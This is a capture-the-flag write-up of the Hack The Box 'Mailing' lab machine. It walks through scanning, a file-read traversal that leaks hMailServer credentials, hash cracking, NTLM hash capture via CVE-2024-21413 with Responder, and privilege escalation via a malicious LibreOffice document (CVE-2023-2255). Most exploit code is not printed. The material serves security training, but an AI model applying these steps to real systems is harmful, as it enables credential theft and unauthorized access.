Contents
Introduction to Mailing:

In this write-up, we will explore the “Mailing” machine from Hack the Box, categorized as an easy difficulty challenge. This walkthrough will cover the reconnaissance, exploitation, and privilege escalation steps required to capture the flag.
Objective:
The goal of this walkthrough is to complete the “Mailing” machine from Hack The Box by achieving the following objectives:
User Flag:
PHP Site Vulnerability
- Found a PHP site with a file read vulnerability.
- Detected a directory traversal exploit allowing deeper access to the file system.
CVE-2024-21413 Exploitation
- A remote code execution vulnerability in Microsoft Outlook allows the capture of user hashes via specially crafted emails or links.
- Exploiting the vulnerability enables unauthorized access to credentials for further system exploitation.
Root Flag:
hMailServer Configuration Leak and Credential Discovery
- Extracted the hMailServer configuration file.
- Cracked the password hash to retrieve valid credentials.
CVE-2023-2255 Exploitation
- A flaw in LibreOffice’s editor components allowed the automatic loading of external links without user consent.
- Documents with “floating frames” linked to external files triggered this vulnerability.
- Affected versions: LibreOffice 7.4 (before 7.4.7) and 7.5 (before 7.5.3).
Enumerating the Machine
Reconnaissance:
Nmap Scan:
Begin with a network scan to identify open ports and running services on the target machine.
nmap -sC -sV -oN nmap_initial.txt 10.10.11.14
Nmap Output:
┌─[darknite@parrot]─[~/Documents/htb]
└──╼ $nmap -sC -sV 10.10.11.14 -oA initial
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-07 06:34 EDT
Nmap scan report for 10.10.11.14
Host is up (0.017s latency).
Not shown: 990 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
25/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to http://mailing.htb
110/tcp open pop3 hMailServer pop3d
|_pop3-capabilities: UIDL USER TOP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
143/tcp open imap hMailServer imapd
|_imap-capabilities: RIGHTS=texkA0001 IDLE CHILDREN NAMESPACE IMAP4rev1 IMAP4 completed ACL CAPABILITY QUOTA OK SORT
445/tcp open microsoft-ds?
465/tcp open ssl/smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
587/tcp open smtp hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap hMailServer imapd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after: 2029-10-06T18:24:10
|_imap-capabilities: RIGHTS=texkA0001 IDLE CHILDREN NAMESPACE IMAP4rev1 IMAP4 completed ACL CAPABILITY QUOTA OK SORT
|_ssl-date: TLS randomness does not represent time
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-07T10:25:06
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: -10m10s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.37 seconds
Analysis:
- Port 25 (SMTP): Handles email transmission via
hMailServer smtpd
, supports authentication. - Port 80 (HTTP): Web server running on IIS 10.0, redirects to
mailing.htb
. - Port 110 (POP3):
hMailServer pop3d
used for retrieving emails from the server. - Port 135 (MSRPC): Microsoft RPC service for remote procedure calls.
- Port 139 (NetBIOS-SSN): Provides file and printer sharing over NetBIOS.
- Port 143 (IMAP):
hMailServer imapd
for email retrieval with IMAP protocol. - Port 445 (Microsoft-DS): Likely SMB file-sharing service on Windows.
- Port 465 (SSL/SMTP): Secure SMTP for sending emails using SSL encryption.
- Port 587 (SMTP): SMTP service using STARTTLS for secure email communication.
- Port 993 (SSL/IMAP): Secure IMAP for encrypted email access
Web Enumeration:
Perform web enumeration to discover potentially exploitable directories and files.
gobuster dir -u http://10.10.11.14 -w /usr/share/wordlists/dirb/common.txt
Gobuster Output:
┌─[darknite@parrot]─[~/Documents/htb]
└──╼ $gobuster dir -u http://mailing.htb -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://mailing.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 160] [--> http://mailing.htb/assets/]
/Assets (Status: 301) [Size: 160] [--> http://mailing.htb/Assets/]
/instructions (Status: 301) [Size: 166] [--> http://mailing.htb/instructions/]
/Instructions (Status: 301) [Size: 166] [--> http://mailing.htb/Instructions/]
Progress: 20116 / 20117 (100.00%)
===============================================================
Finished
===============================================================
Analysis:
Status Code 301 (Moved Permanently):
- These paths are redirected, indicating they are directories:
- /Assets → /Assets/
- /instructions → /instructions/
- /Instructions → /Instructions/
Web Exploitation
Web Application Exploration:

The site’s interface is pretty basic, and at first glance, it doesn’t seem like there’s much to explore.

A few image files are sitting in the assets directory.

You can spot the download option at the bottom of the page.

I encountered an error stating, “No file specified for download.”
Exploit CVE-2024–21413 on mailing machine
CVE-2024–21413 is a remote code execution flaw in Microsoft Outlook that can be used to capture user hashes. The exploit code is available at this GitHub repository.

It seems like an LFI (Local File Inclusion) attack might be possible here.


What is hMailServer?
hMailServer was a free email server for Windows, developed by Martin Knafve. It operated as a Windows service and included tools for management and backup. The server supported IMAP, POP3, and SMTP protocols and could use external databases like MySQL, MS SQL, or PostgreSQL, or an internal MS SQL Compact Edition engine for storing configuration and index data. Email messages were stored on disk in raw MIME format. As of January 15, 2022, active support and development have ended, but version 5.6 still receives updates for critical bugs.

We’ve encountered an MD5 hash that needs to be decrypted to obtain and crack the password. We’ll use CRACKSTATION
to try and crack it.

We’ve successfully cracked the password.
Play around with Responder
Configuring Responder:
To capture the hash, launch Responder using the following command:
sudo responsder -I tun0


It’s running as demonstrated above.

We’ll run the Python script as shown above.


We can read the user flag by typing the “cat user.txt” command
Escalation to Root Privileges Access
Privilege Escalation:
- Exploration: During your system investigation, you discovered a LibreOffice file that stood out. This file, named
dark.odt
, was significant due to its associated LibreOffice version. - LibreOffice File Version: You reviewed the version of LibreOffice related to this file. This detail was key as it could impact the relevance of certain vulnerabilities or exploits.


After searching, I located the LibreOffice component in the Program Files folder, and it’s version 7.4.
CVE-2023-2255 Vulnerability
LibreOffice had a flaw in its editor components that let attackers create documents causing external links to load automatically without user consent. Specifically, documents with “floating frames” linked to external files would load their contents without asking for permission. This inconsistent handling affected versions of LibreOffice 7.4 before 7.4.7 and 7.5 before 7.5.3.

Run the Python script to generate an output file.

Copying the file to the victim’s machine.


The dark.odt
file doesn’t work when executed from the home directory; it only functions when run from C:\Important Documents
. After execution, you can see that Maya’s Local Group Memberships have changed to Administrators.

Next, we need to log in localadmin and get his hash. We can use netexec it
for this purpose.


We can read the root flag by typing the “type root.txt” command